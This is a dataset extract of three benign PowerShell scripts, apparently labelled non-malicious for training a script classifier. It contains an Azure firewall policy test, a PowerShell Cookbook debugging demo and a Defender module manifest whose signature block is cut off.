full_path
stringlengths
31
232
filename
stringlengths
4
167
content
stringlengths
0
48.3M
combined_dataset/train/non-malicious/3943.ps1
3943.ps1
function Test-AzureFirewallPolicyCRUD { $rgname = Get-ResourceGroupName $azureFirewallPolicyName = Get-ResourceName $azureFirewallPolicyAsJobName = Get-ResourceName $resourceTypeParent = "Microsoft.Network/FirewallPolicies" $location = "westcentralus" $ruleGroupName = Get-ResourceName $appRcName = "appRc" $appRcPriority = 400 $appRcActionType = "Allow" $pipelineRcPriority = 154 $appRc2Name = "appRc2" $appRc2Priority = 300 $appRc2ActionType = "Deny" $appRule1Name = "appRule" $appRule1Desc = "desc1" $appRule1Fqdn1 = "*google.com" $appRule1Fqdn2 = "*microsoft.com" $appRule1Protocol1 = "http:80" $appRule1Port1 = 80 $appRule1ProtocolType1 = "http" $appRule1Protocol2 = "https:443" $appRule1Port2 = 443 $appRule1ProtocolType2 = "https" $appRule1SourceAddress1 = "192.168.0.0/16" $appRule2Name = "appRule2" $appRule2Fqdn1 = "*bing.com" $appRule2Protocol1 = "http:8080" $appRule2Protocol2 = "https:443" $appRule2Port1 = 8080 $appRule2ProtocolType1 = "http" $appRule2SourceAddress1 = "192.168.0.0/16" $networkRcName = "networkRc" $networkRcPriority = 200 $networkRcActionType = "Deny" $networkRule1Name = "networkRule" $networkRule1Desc = "desc1" $networkRule1SourceAddress1 = "10.0.0.0" $networkRule1SourceAddress2 = "111.1.0.0/24" $networkRule1DestinationAddress1 = "*" $networkRule1Protocol1 = "UDP" $networkRule1Protocol2 = "TCP" $networkRule1Protocol3 = "ICMP" $networkRule1DestinationPort1 = "90" $natRcName = "natRc" $natRcPriority = 200 $natRcActionType = "Dnat" $natRule1Name = "natRule" $natRule1Desc = "desc1" $natRule1SourceAddress1 = "10.0.0.0" $natRule1SourceAddress2 = "111.1.0.0/24" $natRule1DestinationAddress1 = "1.2.3.4" $natRule1Protocol1 = "UDP" $natRule1Protocol2 = "TCP" $natRule1DestinationPort1 = "90" $natRule1TranslatedAddress = "10.1.2.3" $natRule1TranslatedPort = "91" try { $resourceGroup = New-AzResourceGroup -Name $rgname -Location $location -Tags @{ testtag = "testval" } $azureFirewallPolicy = New-AzFirewallPolicy -Name $azureFirewallPolicyName -ResourceGroupName $rgname -Location $location $getAzureFirewallPolicy = Get-AzFirewallPolicy -Name $azureFirewallPolicyName -ResourceGroupName $rgname Assert-AreEqual $rgName $getAzureFirewallPolicy.ResourceGroupName Assert-AreEqual $azureFirewallPolicyName $getAzureFirewallPolicy.Name Assert-NotNull $getAzureFirewallPolicy.Location Assert-AreEqual (Normalize-Location $location) $getAzureFirewallPolicy.Location Assert-AreEqual "Alert" $getAzureFirewallPolicy.ThreatIntelMode $appRule = New-AzFirewallPolicyApplicationRule -Name $appRule1Name -Description $appRule1Desc -Protocol $appRule1Protocol1, $appRule1Protocol2 -TargetFqdn $appRule1Fqdn1, $appRule1Fqdn2 -SourceAddress $appRule1SourceAddress1 $appRule2 = New-AzFirewallPolicyApplicationRule -Name $appRule2Name -Description $appRule1Desc -Protocol $appRule2Protocol1, $appRule2Protocol2 -TargetFqdn $appRule2Fqdn1 -SourceAddress $appRule2SourceAddress1 $networkRule = New-AzFirewallPolicyNetworkRule -Name $networkRule1Name -Description $networkRule1Desc -Protocol $networkRule1Protocol1, $networkRule1Protocol2 -SourceAddress $networkRule1SourceAddress1, $networkRule1SourceAddress2 -DestinationAddress $networkRule1DestinationAddress1 -DestinationPort $networkRule1DestinationPort1 $appRc = New-AzFirewallPolicyFilterRuleCollection -Name $appRcName -Priority $appRcPriority -Rule $appRule, $appRule2 -ActionType $appRcActionType $appRc2 = New-AzFirewallPolicyFilterRuleCollection -Name $appRc2Name -Priority $appRc2Priority -Rule $networkRule -ActionType $appRc2ActionType $natRc = New-AzFirewallPolicyNatRuleCollection -Name $networkRcName -Priority $natRcPriority -Rule $networkRule -TranslatedAddress $natRule1TranslatedAddress -TranslatedPort $natRule1TranslatedPort -ActionType $natRcActionType New-AzFirewallPolicyRuleCollectionGroup -Name $ruleGroupName -Priority 100 -RuleCollection $appRc, $appRc2, $natRc -FirewallPolicyObject $azureFirewallPolicy $azureFirewallPolicy.ThreatIntelMode = "Deny" Set-AzFirewallPolicy -InputObject $azureFirewallPolicy $getAzureFirewallPolicy = Get-AzFirewallPolicy -Name $azureFirewallPolicyName -ResourceGroupName $rgName Assert-AreEqual $rgName $getAzureFirewallPolicy.ResourceGroupName Assert-AreEqual $azureFirewallPolicyName $getAzureFirewallPolicy.Name Assert-NotNull $getAzureFirewallPolicy.Location Assert-AreEqual $location $getAzureFirewallPolicy.Location Assert-AreEqual "Deny" $getAzureFirewallPolicy.ThreatIntelMode Assert-AreEqual 1 @($getAzureFirewallPolicy.RuleCollectionGroups).Count $getRg = Get-AzFirewallPolicyRuleCollectionGroup -Name $ruleGroupName -AzureFirewallPolicy $getAzureFirewallPolicy Assert-AreEqual 3 @($getRg.properties.ruleCollection).Count $filterRuleCollection1 = $getRg.Properties.GetRuleCollectionByName($appRcName) $natRuleCollection = $getRg.Properties.GetRuleCollectionByName($networkRcName) Assert-AreEqual $appRcName $filterRuleCollection1.Name Assert-AreEqual $appRcPriority $filterRuleCollection1.Priority Assert-AreEqual $appRcActionType $filterRuleCollection1.Action.Type Assert-AreEqual 2 $filterRuleCollection1.Rules.Count $appRule = $filterRuleCollection1.GetRuleByName($appRule1Name) Assert-AreEqual $appRule1Name $appRule.Name Assert-AreEqual 1 $appRule.SourceAddresses.Count Assert-AreEqual $appRule1SourceAddress1 $appRule.SourceAddresses[0] Assert-AreEqual 2 $appRule.Protocols.Count Assert-AreEqual $appRule1ProtocolType1 $appRule.Protocols[0].ProtocolType Assert-AreEqual $appRule1ProtocolType2 $appRule.Protocols[1].ProtocolType Assert-AreEqual $appRule1Port1 $appRule.Protocols[0].Port Assert-AreEqual $appRule1Port2 $appRule.Protocols[1].Port Assert-AreEqual 2 $appRule.TargetFqdns.Count Assert-AreEqual $appRule1Fqdn1 $appRule.TargetFqdns[0] Assert-AreEqual $appRule1Fqdn2 $appRule.TargetFqdns[1] $natRule = $natRuleCollection.GetRuleByName($networkRcName) Assert-AreEqual $networkRcName $natRuleCollection.Name Assert-AreEqual $natRcPriority $natRuleCollection.Priority Assert-AreEqual $networkRule1Name $natRule.Name Assert-AreEqual 2 $natRule.SourceAddresses.Count Assert-AreEqual $natRule1SourceAddress1 $natRule.SourceAddresses[0] Assert-AreEqual $natRule1SourceAddress2 $natRule.SourceAddresses[1] Assert-AreEqual 1 $natRule.DestinationAddresses.Count Assert-AreEqual 2 $natRule.Protocols.Count Assert-AreEqual $networkRule1Protocol1 $natRule.Protocols[0] Assert-AreEqual $networkRule1Protocol2 $natRule.Protocols[1] Assert-AreEqual 1 $natRule.DestinationPorts.Count Assert-AreEqual $natRule1DestinationPort1 $natRule.DestinationPorts[0] Assert-AreEqual $natRule1TranslatedAddress $natRuleCollection.TranslatedAddress Assert-AreEqual $natRule1TranslatedPort $natRuleCollection.TranslatedPort $testPipelineRg = Get-AzFirewallPolicyRuleCollectionGroup -Name $ruleGroupName -AzureFirewallPolicyName $getAzureFirewallPolicy.Name -ResourceGroupName $rgname $testPipelineRg|Set-AzFirewallPolicyRuleCollectionGroup -Priority $pipelineRcPriority $testPipelineRg = Get-AzFirewallPolicyRuleCollectionGroup -Name $ruleGroupName -AzureFirewallPolicyName $getAzureFirewallPolicy.Name -ResourceGroupName $rgname Assert-AreEqual $pipelineRcPriority $testPipelineRg.properties.Priority $azureFirewallPolicyAsJob = New-AzFirewallPolicy -Name $azureFirewallPolicyAsJobName -ResourceGroupName $rgname -Location $location -AsJob $result = $azureFirewallPolicyAsJob | Wait-Job Assert-AreEqual "Completed" $result.State; } finally { Clean-ResourceGroup $rgname } }
combined_dataset/train/non-malicious/Invoke-ComplexScript.ps1
Invoke-ComplexScript.ps1
#############################################################################\n##\n## Invoke-ComplexScript\n##\n## From Windows PowerShell Cookbook (O'Reilly)\n## by Lee Holmes (http://www.leeholmes.com/guide)\n##\n##############################################################################\n\n<#\n\n.SYNOPSIS\n\nDemonstrates the functionality of PowerShell's debugging support.\n\n#>\n\nSet-StrictMode -Version Latest\n\nWrite-Host "Calculating lots of complex information"\n\n$runningTotal = 0\n$runningTotal += [Math]::Pow(5 * 5 + 10, 2)\n\nWrite-Debug "Current value: $runningTotal"\n\nSet-PsDebug -Trace 1\n$dirCount = @(Get-ChildItem $env:WINDIR).Count\n\nSet-PsDebug -Trace 2\n$runningTotal -= 10\n$runningTotal /= 2\n\nSet-PsDebug -Step\n$runningTotal *= 3\n$runningTotal /= 2\n\n$host.EnterNestedPrompt()\n\nSet-PsDebug -off
combined_dataset/train/non-malicious/sample_52_17.ps1
sample_52_17.ps1
@{ GUID = 'A51E6D9E-BC14-41A7-98A8-888195641250' Author="Microsoft Corporation" CompanyName="Microsoft Corporation" Copyright="Copyright (C) Microsoft Corporation. All rights reserved." ModuleVersion = '1.0' NestedModules = @('MSFT_MpPerformanceRecording.psm1') FormatsToProcess = @('MSFT_MpPerformanceReport.Format.ps1xml') CompatiblePSEditions = @('Desktop', 'Core') FunctionsToExport = @( 'New-MpPerformanceRecording', 'Get-MpPerformanceReport' ) HelpInfoUri="http://go.microsoft.com/fwlink/?linkid=390762" PowerShellVersion = '5.1' } # SIG # Begin signature block # MIIlpgYJKoZIhvcNAQcCoIIllzCCJZMCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCC5QoGq9EV41ZN5 # fnwNlxKx8aIBP8W7y/AxkQ4SrJmPcKCCC2IwggTvMIID16ADAgECAhMzAAAK69Nl # RIMWPjjtAAAAAArrMA0GCSqGSIb3DQEBCwUAMHkxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xIzAhBgNVBAMTGk1pY3Jvc29mdCBXaW5kb3dzIFBD # QSAyMDEwMB4XDTIzMTAxOTE5MTgwMloXDTI0MTAxNjE5MTgwMlowcDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEaMBgGA1UEAxMRTWljcm9zb2Z0 # IFdpbmRvd3MwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCfg+TEc3bT # Vvq+rfw2TA/Aluhr9MvjyW4v2sVY1+wdq98kJogwk5wRwMEPNKacaRJn02l8VCT5 # eblNMpXt3iD7AcYN+cSnvC4rBDCNKAJAf1ND9AYU9kpP3eKKrxjkbNq5I5uxrIRW # AP2K3gqGsN8peSb+7/BCINSMrmJ7Tx46PXz8asIJY3TEmq4x13zC5uXtIIb1s/d1 # PWrE9KDPyz16VZQx+ZlNEnFVXH6Cg2gw7AJMQLUHJgeLfLcBilLd/P+2j04e7dgD # s6fc0Wrw+Bz5EA/kV77PxHLEt7apceKqp5+dNMo1unzlZuMIh5+A6HA7aXbdF9KX # ujJ6b2MlurVnAgMBAAGjggF3MIIBczAfBgNVHSUEGDAWBgorBgEEAYI3CgMGBggr # BgEFBQcDAzAdBgNVHQ4EFgQUU6kklw2HQNa4/ec1p2tW744uJekwVAYDVR0RBE0w # S6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGlt # aXRlZDEWMBQGA1UEBRMNMjMwMDI4KzUwMTcwNTAfBgNVHSMEGDAWgBTRT6mKBwjO # 9CQYmOUA//PWeR03vDBTBgNVHR8ETDBKMEigRqBEhkJodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNXaW5QQ0FfMjAxMC0wNy0wNi5j # cmwwVwYIKwYBBQUHAQEESzBJMEcGCCsGAQUFBzAChjtodHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpL2NlcnRzL01pY1dpblBDQV8yMDEwLTA3LTA2LmNydDAMBgNV # HRMBAf8EAjAAMA0GCSqGSIb3DQEBCwUAA4IBAQBks51pE8oGEEiS12JhhlAAD/Hf # E6sdGt6b37sp62b9mymV/X3pl4YjPxzeckToiB4SBLLCuG6PCFWBWvKF3QZV7p4L # fClCVjXz5SRXHzgZlXnEReG7r4GMXZ9i06zcSWcy/rFEINTZtPCwLYMNTEIpcW+t # ojVpI6X4FRV5YjfFirE4qmmLYyTQioPYJO5/n2/Xz/BcNj2GFvGycjAtuITmvlPH # g/ZTaTas8PD5loz8YKngKl/DvfTWEHDyYAdmNZcNRP2BuKf3kksHN20z6Lf/JCK1 # et2f5zMarFELgr12wrdI/8z4+hleNPf9cqU36jrEFauG+XaucS5UlnGp043TMIIG # azCCBFOgAwIBAgIKYQxqGQAAAAAABDANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMTAwNzA2MjA0MDIz # WhcNMjUwNzA2MjA1MDIzWjB5MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSMwIQYDVQQDExpNaWNyb3NvZnQgV2luZG93cyBQQ0EgMjAxMDCCASIw # DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMB5uzqx8A+EuK1kKnUWc9C7B/Y+ # DZ0U5LGfwciUsDh8H9AzVfW6I2b1LihIU8cWg7r1Uax+rOAmfw90/FmV3MnGovdS # cFosHZSrGb+vlX2vZqFvm2JubUu8LzVs3qRqY1pf+/MNTWHMCn4x62wK0E2XD/1/ # OEbmisdzaXZVaZZM5NjwNOu6sR/OKX7ET50TFasTG3JYYlZsioGjZHeYRmUpnYMU # pUwIoIPXIx/zX99vLM/aFtgOcgQo2Gs++BOxfKIXeU9+3DrknXAna7/b/B7HB9jA # vguTHijgc23SVOkoTL9rXZ//XTMSN5UlYTRqQst8nTq7iFnho0JtOlBbSNECAwEA # AaOCAeMwggHfMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBTRT6mKBwjO9CQY # mOUA//PWeR03vDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDCBnQYDVR0g # BIGVMIGSMIGPBgkrBgEEAYI3LgMwgYEwPQYIKwYBBQUHAgEWMWh0dHA6Ly93d3cu # bWljcm9zb2Z0LmNvbS9QS0kvZG9jcy9DUFMvZGVmYXVsdC5odG0wQAYIKwYBBQUH # AgIwNB4yIB0ATABlAGcAYQBsAF8AUABvAGwAaQBjAHkAXwBTAHQAYQB0AGUAbQBl # AG4AdAAuIB0wDQYJKoZIhvcNAQELBQADggIBAC5Bpoa1Bm/wgIX6O8oX6cn65DnC # lHDDZJTD2FamkI7+5Jr0bfVvjlONWqjzrttGbL5/HVRWGzwdccRRFVR+v+6llUIz # /Q2QJCTj+dyWyvy4rL/0wjlWuLvtc7MX3X6GUCOLViTKu6YdmocvJ4XnobYKnA0b # jPMAYkG6SHSHgv1QyfSHKcMDqivfGil56BIkmobt0C7TQIH1B18zBlRdQLX3sWL9 # TUj3bkFHUhy7G8JXOqiZVpPUxt4mqGB1hrvsYqbwHQRF3z6nhNFbRCNjJTZ3b65b # 3CLVFCNqQX/QQqbb7yV7BOPSljdiBq/4Gw+Oszmau4n1NQblpFvDjJ43X1PRozf9 # pE/oGw5rduS4j7DC6v119yxBt5yj4R4F/peSy39ZA22oTo1OgBfU1XL2VuRIn6Mj # ugagwI7RiE+TIPJwX9hrcqMgSfx3DF3Fx+ECDzhCEA7bAq6aNx1QgCkepKfZxpol # Vf1Ayq1kEOgx+RJUeRryDtjWqx4z/gLnJm1hSY/xJcKLdJnf+ZMakBzu3ZQzDkJQ # 239Q+J9iguymghZ8ZrzsmbDBWF2osJphFJHRmS9J5D6Bmdbm78rj/T7u7AmGAwcN # Gw186/RayZXPhxIKXezFApLNBZlyyn3xKhAYOOQxoyi05kzFUqOcasd9wHEJBA1w # 3gI/h+5WoezrtUyFMYIZmjCCGZYCAQEwgZAweTELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEjMCEGA1UEAxMaTWljcm9zb2Z0IFdpbmRvd3MgUENB # IDIwMTACEzMAAArr02VEgxY+OO0AAAAACuswDQYJYIZIAWUDBAIBBQCgga4wGQYJ # KoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEOMAwGCisGAQQB # gjcCARUwLwYJKoZIhvcNAQkEMSIEICjaAYW6dpF96OECCa1j0HmEWEEdofGluuKS # KwAnvISeMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8AcwBvAGYAdKEa # gBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEBBQAEggEAaxgs # 9GkngpovGZ++THpqnZRiAcdPPw0wrkmXHC/WHOqLT1FEVw3B3NMjc818wWbLlYtb # f3geto2AIEcVBIq3DvZA0nm1OId6pmsER3FzA314dSjj2ln54h5T0r46eX5996i9 # Tm/vT4whBKAfGq98C9cGcCUXqpD8EhB+QjbHfKofqZLSAhtJeo6N8s/mc0MHNSvp # 2Abh6w1qRt0wRjpByyanYrNSBrpqATFTiq5GQgGRi2/MtB2t1UpMjqw+N2YnBZqR # laeoHW84Lm2fgeYgm0qdHmsfYDjYYlU+PmPp9Omb2cOIGqhtl/f3zPTJVdzcFDaM # qnnAonXp99i6JFu3TKGCFykwghclBgorBgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3 # DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsqhkiG9w0BCRAB # BKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFlAwQCAQUABCCs # NQqhRClUZDXHBEqXRdiBxl3jjjYSt87orYc9z50r3wIGZjOpIolHGBMyMDI0MDUw # OTAwNDEwNS40NjhaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z # b2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVy # YXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNOOjhENDEtNEJG # Ny1CM0I3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIR # eDCCBycwggUPoAMCAQICEzMAAAHj372bmhxogyIAAQAAAeMwDQYJKoZIhvcNAQEL # BQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMxMDEyMTkwNzI5 # WhcNMjUwMTEwMTkwNzI5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBM # aW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4RDQxLTRCRjctQjNCNzEl # MCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCCAiIwDQYJKoZI # hvcNAQEBBQADggIPADCCAgoCggIBAL6kDWgeRp+fxSBUD6N/yuEJpXggzBeNG5KB # 8M9AbIWeEokJgOghlMg8JmqkNsB4Wl1NEXR7cL6vlPCsWGLMhyqmscQu36/8h2bx # 6TU4M8dVZEd6V4U+l9gpte+VF91kOI35fOqJ6eQDMwSBQ5c9ElPFUijTA7zV7Y5P # RYrS4FL9p494TidCpBEH5N6AO5u8wNA/jKO94Zkfjgu7sLF8SUdrc1GRNEk2F91L # 3pxR+32FsuQTZi8hqtrFpEORxbySgiQBP3cH7fPleN1NynhMRf6T7XC1L0PRyKy9 # MZ6TBWru2HeWivkxIue1nLQb/O/n0j2QVd42Zf0ArXB/Vq54gQ8JIvUH0cbvyWM8 # PomhFi6q2F7he43jhrxyvn1Xi1pwHOVsbH26YxDKTWxl20hfQLdzz4RVTo8cFRMd # QCxlKkSnocPWqfV/4H5APSPXk0r8Cc/cMmva3g4EvupF4ErbSO0UNnCRv7UDxlSG # iwiGkmny53mqtAZ7NLePhFtwfxp6ATIojl8JXjr3+bnQWUCDCd5Oap54fGeGYU8K # xOohmz604BgT14e3sRWABpW+oXYSCyFQ3SZQ3/LNTVby9ENsuEh2UIQKWU7lv7ch # rBrHCDw0jM+WwOjYUS7YxMAhaSyOahpbudALvRUXpQhELFoO6tOx/66hzqgjSTOE # Y3pu46BFAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUsa4NZr41FbehZ8Y+ep2m2YiY # qQMwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBU # oFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwvTWljcm9z # b2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEB # BGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9w # cy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5j # cnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAOBgNVHQ8B # Af8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBALe+my6p1NPMEW1t70a8Y2hGxj6s # iDSulGAs4UxmkfzxMAic4j0+GTPbHxk193mQ0FRPa9dtbRbaezV0GLkEsUWTGF2t # P6WsDdl5/lD4wUQ76ArFOencCpK5svE0sO0FyhrJHZxMLCOclvd6vAIPOkZAYihB # H/RXcxzbiliOCr//3w7REnsLuOp/7vlXJAsGzmJesBP/0ERqxjKudPWuBGz/qdRl # JtOl5nv9NZkyLig4D5hy9p2Ec1zaotiLiHnJ9mlsJEcUDhYj8PnYnJjjsCxv+yJz # ao2aUHiIQzMbFq+M08c8uBEf+s37YbZQ7XAFxwe2EVJAUwpWjmtJ3b3zSWTMmFWu # nFr2aLk6vVeS0u1MyEfEv+0bDk+N3jmsCwbLkM9FaDi7q2HtUn3z6k7AnETc28dA # vLf/ioqUrVYTwBrbRH4XVFEvaIQ+i7esDQicWW1dCDA/J3xOoCECV68611jriajf # dVg8o0Wp+FCg5CAUtslgOFuiYULgcxnqzkmP2i58ZEa0rm4LZymHBzsIMU0yMmuV # mAkYxbdEDi5XqlZIupPpqmD6/fLjD4ub0SEEttOpg0np0ra/MNCfv/tVhJtz5wgi # EIKX+s4akawLfY+16xDB64Nm0HoGs/Gy823ulIm4GyrUcpNZxnXvE6OZMjI/V1Ag # SAg8U/heMWuZTWVUMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJmQAAAAAAFTAN # BgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0 # b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3Jh # dGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9y # aXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3Nv # ZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCC # AgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDi # vbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhgfWpSg0S3po5G # awcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2rrPY2vjUm # ZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/dvI2k45GPsjks # UZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka97aSueik3rMvr # g0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKRHh09/SDPc31B # mkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9ituqBJR6L8FA6PR # c6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyOArxCaC4Q6oRR # RuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItboKaDIV1fMHSR # lJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6bMURHXLvjflS # xIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6tAgMBAAGjggHd # MIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSa # voKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYD # VR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnkuaHRtMBMGA1Ud # JQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsGA1Ud # DwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjR # PZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0 # LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNy # bDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93d3cubWljcm9z # b2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0G # CSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/qXBS2Pk5HZHix # BpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjY # Ni6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVtI1TkeFN1JFe5 # 3Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kpicO8F7BU # hUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTpkbKpW99Jo3QM # vOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0sHrYUP4KWN1A # PMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138eW0QBjloZkWsN # n6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJsWkBRH58oWFs # c/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue1 # 0CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6g # MTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQtB1VM1izoXBm # 